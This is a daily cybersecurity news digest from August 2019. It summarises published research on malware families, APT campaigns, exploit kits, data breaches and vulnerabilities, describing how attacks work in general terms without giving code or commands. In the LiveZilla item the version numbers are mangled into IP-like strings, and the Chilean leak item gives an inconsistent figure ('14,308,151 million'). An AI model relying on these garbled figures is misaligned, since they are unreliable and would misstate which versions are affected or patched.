Silobreaker Daily Cyber Digest – 02 August 2019
DealPly Adware prolongs life by abusing Microsoft and McAfee reputation service
- Ensilo researchers detected a variant of DealPly malware which uses data from Microsoft SmartScreen and McAfee WebAdvisor reputation services. Researchers suspect that DealPly checks to see if any of its variants and download sites are compromised. By performing these checks the malware authors can generate new samples when required.
- DealPly is most commonly delivered through legitimate software installers, the malware also contains modular code, machine fingerprinting, VM detection techniques, and more.
Source (Includes IOCs)
New SystemBC proxy malware delivered in Fallout and RIG exploit kits
- On June 4th, 2019, researchers at Proofpoint discovered SystemBC malware being deployed in a Fallout EK campaign. Two days later the malware was again identified, this time in a Fallout EK and PowerEnum campaign. The malware was spotted for a third time between July 18th and July 22nd, 2019, being distributed in a RIG EK campaign.
- SystemBC is a proxy malware written in C++, the principal function of the virus is to establish SOCKS5 proxies on a target machine. Threat actors can utilize SOCKS5 proxies to hide malicious traffic that is associated with other malware, such as the Danabot banking trojan. SystemBC also encrypts important strings, such as C2 servers and port numbers with a 40-byte XOR key.
- The researchers stated that SystemBC, when used in conjunction with mainstream malware, would prove to be challenging for those who rely on network edge detections.
Source (Includes IOCs)
Amavaldo malware is one of ten new banking trojan families targeting Latin America
- ESET researchers analysed banking trojans used in Latin America. The researchers found that Latin America banking Trojans often share common features, such as being written in Delphi, containing backdoors, using social engineering tactics, employing long distribution chains, targeting Spanish or Portuguese speaking countries, and more. Distinct malware families could be distinguished by identifying difference in string storage, C2 addresses, and code patterns.
- The researchers analyzed one of these families, dubbed Amavaldo malware. Detected in Brazil and Mexico, the malware is distributed through MIS installers that the victim believes will install an Adobe product. The malware collects information on the computer’s OS and detects any installed banking protection. This information is communicated back to the attacker via the SecureBridge Delphi library.
- Amavaldo can log keystrokes, take screenshots, access webcams, self-update, and more. Additionally, when banking-related windows are open on a user’s device, the malware will take a screenshot of the desktop and displays it as the victim’s wallpaper. A fake pop-up window is then spawned, which the user is forced to interact with.
Source (Includes IOCs)
Cryptomining Lemon_Duck malware uses Eternalblue to spread across networks
- Researchers at SentinelOne discovered Lemon_Duck malware using the Eternalblue and PowerSploit tools. The initial infection vector is lateral movement, identified as an Eternalblue exploit. Following infection, a fileless attack executes commands that reconfigure the firewall to redirect network traffic and create a task to download a file from the attacker’s server.
- The final payload allows the attacker to get system details such as the computer’s name, MAC address, BIT architecture, and more. This data is communicated to the C2 so that the relevant module can be downloaded. The malware also downloads files which give the attacker escalated privileges, supports credential stealing features and allow the exploitation of Eternalblue to propagate further.
Source (Includes IOCs)
New malware targets US utilities sector
- Proofpoint researchers discovered new malware, dubbed LookBack, used in a spear phishing campaign against three US companies operating in the utilities sector. Given the overlap with historical campaigns and macros, the researchers believe a state-sponsored APT to be behind the attacks. Analysts noted a similarity between the macros used in this campaign, and older APT campaigns targeting Japanese companies in 2018.
- The US companies were targeted between July 19th and July 25th, 2019, via fake emails with attachments supposedly containing examination results from the National Council of Examiners for Engineering and Surveying. Once the attachment is opened, malicious macros contained in the document install and execute LookBack.
- LookBack consists of a remote access trojan module and a proxy mechanism for C2 communication. It is capable of enumerating services, viewing processes, system and file data, deleting files, executing commands, taking screenshots, controlling the mouse and rebooting the machine and deleting itself from an infected host.
Source (Includes IOCs)
Same actor believed to be behind Synology and QNAP NAS ransomware attacks
- Researchers at Anomali analysed the recent brute force attacks attempting to deploy ransomware on Synology Network Attached Storage (NAS) devices. They believe the actor is the same as the one behind the recent eCh0raix ransomware attacks on QNAP NAS devices. The researchers found similarities in the code, ransom amount and shared strings.
- According to the researchers, the threat actor is likely to continue such activity, since NAS devices offer a large target pool, as well as more leverage, due to many companies and individuals using NAS devices for final backups.
Cobalt Group targets Kazakh bank
- Check Point Research discovered a Cobalt Group campaign that targeted Kassa Nova bank customers with a malicious document hosted on the bank’s own website. The bank successfully remediated the attack after detection.
- The malicious files contained valid certificates and Kassa Nova’s official logo, tricking victims into running embedded macros. This starts a multi-stage infection chain that eventually executes Cobalt Strike beacon.
- Check Point Research attributed the attack to Cobalt Group, as it contained many overlaps in TTPs, targets and other technical aspects. Researchers also pointed out that this attack indicates that despite the earlier arrest of Cobalt Group’s leader, the group continues to expand its toolset and range of targets.
Source (Includes IOCs)
McAfee publish analysis of Clop Ransomware
- Researchers at McAfee stated that Clop Ransomware continues to be updated by cybercriminals since its initial discovery on February 8th, 2019.
- Characteristics of the ransomware show that the enterprises are the intended target rather than consumers, and it is calibrated to avoid computers running Russian or other languages spoken in the Commonwealth of Independent States. McAfee detection showed the ransomware overwhelmingly targeting devices in the US.
- A second version of Clop was detected at the end of February which featured updates to elements of code, and contained a new ransom note with clearer instructions. The researchers concluded that Clop is a constantly evolving threat.
Source (Includes IOCs)
Researchers warn about uptick in client-side credit card theft
- Researchers at Malwarebytes Labs have observed an increase in the number of blocked exfiltration gates and skimmer domains, with peak detections occurring on July 4th, 2019.
- During July 2019, Malwarebytes detected and blocked over 65,000 attempts of credit card theft by Magecart, of which 69.2 percent targeted shoppers in North America.
- Malwarebytes Labs advise that organisations must implement a patching, hardening and mitigation cycle to prevent initial compromise or re-infection.
Industrial control systems entities targeted by new threat actor
- Researchers at Dragos discovered a new threat actor, called Hexane, targeting industrial oil and gas companies in the Middle East, with a strong focus on Kuwait. The group appears to be active since at least mid-2018, accelerating its activity in early to mid-2019.
- Hexane has also targeted telecommunication providers in the greater Middle East, Central Asia, and Africa.
- Similarities were found in the behaviors and tactics, techniques and procedures (TTPs) of Hexane and APT33 and APT34, all of which are targeting industrial control system entities, focusing mainly on oil and gas.
Palo Alto Networks publish analysis of Rocke hacking group’s TTPs
- Palo Alto Network researchers found that the so called Rocke group often exploits vulnerabilities dating backing to 2016 and 2017 to download backdoors, subsequently delivering multiple payloads to gain administrative access to cloud systems. By gaining administrative access, Rocke can kill off rival’s miners and establish their own Monero mining software.
- NetFlow data analysed between December 2018 and June 16th, 2019, showed that 28.1% of cloud environment surveyed by the researchers had at least one fully established network connection with at least one Rocke C2.
- The researchers also discovered that Rocke were using Godlua malware and have added a DoS function and LUA switch functionality to their toolkit.
Leaks and Breaches
Librería Porrúa breach exposes 2.1 million customer records
- Despite having been notified of an exposed MongoDB database, the Mexico-based bookseller Librería Porrúa failed to take the database offline before hackers gained access. The hackers then proceeded to wipe the database and demand a ransom. It is unclear whether the company paid the ransom.
- The exposed data included 1.2 million purchase records and 958,000 personal data records, including full names, dates of birth, email addresses, phone numbers and more. It is unclear how many users were affected.
Sephora customer data potentially found on dark web
- Group-IB found two databases containing customer data for sale on the dark web, which are likely related to Sephora. Sephora had previously stated it does not believe any personal data was misused.
- The first database includes 500,000 records, including usernames and hashed passwords. The second database contains 3.2 million records and was originally leaked in March 2019. Data includes names, genders, ethnicities, logins, encrypted passwords, dates of registration and last activity, IP of registration and more.
- Group-IB advises customers to change their passwords and warns that despite no payment information included in the records, the data present can easily be used for social engineering or targeted phishing attacks.
Over 1 million South Korean CP records for sale on dark web
- Gemini Advisory found a sharp rise in the number of South Korean-issued Card Present (CP) records available on the dark web, with over 1 million compromised records posted for sale since May 29th, 2019. CP records are often obtained by installing malware into systems with point-of-sale (POS) devices or using skimmers and overlays at ATMS or POS terminals.
- It is unclear where the data was obtained from. The records could have been obtained via a breach in a parent company, allowing threat actors access to multiple merchants and POS terminals. Another possibility is that a POS integrator was breached, enabling threat actors to gain access to payment data from multiple sources.
Unsecured Bank of Cardiff Amazon S3 bucket exposes private conversations
- The California-based Bank of Cardiff exposed over 1 million audio recordings of phone calls in an unsecured Amazon S3 bucket. Some of the exposed files have since been secured, however, many audio clips continue to be available to download.
- A large amount of recordings date from 2015 to 2017 and many of the calls involve discussions about loans. Some also include named employees reading out their phone numbers.
Chilean voter records leaked online
- The data of 14,308,151 million Chileans has been exposed online as the result of unsecure Elasticsearch database. Information within the database included names, addresses, ages, and tax ID numbers, and has been confirmed as valid by ZDNet and Chile’s Electoral Service. However, the Electoral Service denies that they own the server, stating that it was probably scraped from their official website, and later assembled into databases by a third-party.
- The leaky server is still online as of August 2nd, 2019.
Data leaks affect two Indian financial services sites
- vpnMentor found unencrypted and unsecured databases belonging to Credit Fair and Chqbook on July 24th, 2019. Chqbook has since closed its leak, however, Credit Fair’s database remains open.
- A total of 44,000 records were exposed in the Credit Fair database, whereas the Chqbook database contained 67GB of data. Exposed data includes full names, phone numbers, addresses, email addresses, credit card numbers and more.
- The data leak risks exposing clients to identity fraud, account takeovers, phishing attacks, blackmail, extortion and physical threats, such as household robberies.
iPhone’s AirDrop feature can leak phone numbers
- Researchers at Hexway found that when Bluetooth is on, an iPhone broadcasts its status constantly, allowing those nearby to acquire information about the device’s battery, name, OS version and more.
- AirDrop broadcasts a SHA256 hash of the user’s phone number to all nearby devices whenever ‘Share’ is used. An attacker could acquire and recover phone numbers from these hashes by matching them to a database of hashed phone numbers corresponding to the user’s region.
- During Wi-Fi password sharing, partial hashes of an iPhone user’s phone number, AppleID and email are requested via Bluetooth. It is possible to trigger “Share Wi-Fi password” messages in order to acquire this data.
- Hexway note that these issues are ‘more a feature of the work of the ecosystem than a vulnerability’. iOS from 10.3.1 onwards, on iPhone 6 and above, display this behaviour.
Vulnerabilities discovered in Hickory Smart Device Ecosystem
- Six flaws were discovered in the Hickory Smart device ecosystem, with four of them being assigned CVEs. CVE-2019-5632 and CVE-2019-5633 are both related to an insecure data storage issue in Hickory Android and iOS applications respectively, that could allow an attacker to read, modify and delete sensitive information. CVE-2019-5634 refers to the inclusion of the same sensitive data within the Android application’s log files.
- CVE-2019-5635 is a data exposure issue. Sensitive information is transmitted as cleartext between clients and the MQTT server. The two vulnerabilities lacking identifiers are cleartext data transmission issues in the Web API, which could allow an attacker to easily sniff the contents.
- The vulnerabilities were responsibly disclosed to Hickory Hardware and Delphian Systems, as well as CERT/CC, but the public disclosure deadline has since expired. Rapid7 has stated that the vendor has not acknowledged any of the vulnerabilities or offered any updates to remedy them.
XSS vulnerability found in WordPress Shopify plugin
- The plugin has been temporarily removed from the WordPress repository until a patch is released.
Seven vulnerabilities detected in LiveZilla Live Chat Software
- Fortinet researchers reported seven vulnerabilities in Live Chat, the Next Generation Live Help and Live Support System version 184.108.40.206 and prior. The vulnerabilities, which ranged from critical to medium severity, could all be attributed to a lack of trivial input sanitization.
- The researchers reported the vulnerabilities to LiveZilla, starting from June 22nd, 2019. The flaws have all been addressed by patch 220.127.116.11 which was released on July 23rd, 2019. A technical run through of the vulnerabilities is available via Fortinet.
Empire post-exploitation framework no longer maintained
- Developer Chris Ross announced on July 31st, 2019, that the project had fulfilled its original purpose of showing PowerShell exploit capabilities and raising awareness of the potential for PowerShell to be used maliciously, consequently he stated that Empire would be discontinued.
- Since its release in 2015 Empire has been used by offensive security teams and hackers. Notable users include the APT group Hades and the criminal group FIN7.
Californian city confirms it was hit with ransomware
- Lodi City’s computer systems were infected in April and May 2019, with attackers demanding a 75 BTC ransom. The infection vector was an email, and primary targets were phone lines and financial data systems.
- Initial attempts to fix the issue succeeded, but Lodi Police Department was subsequently compromised. The city did not pay the ransom, instead electing to restore their systems from back-ups.
The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.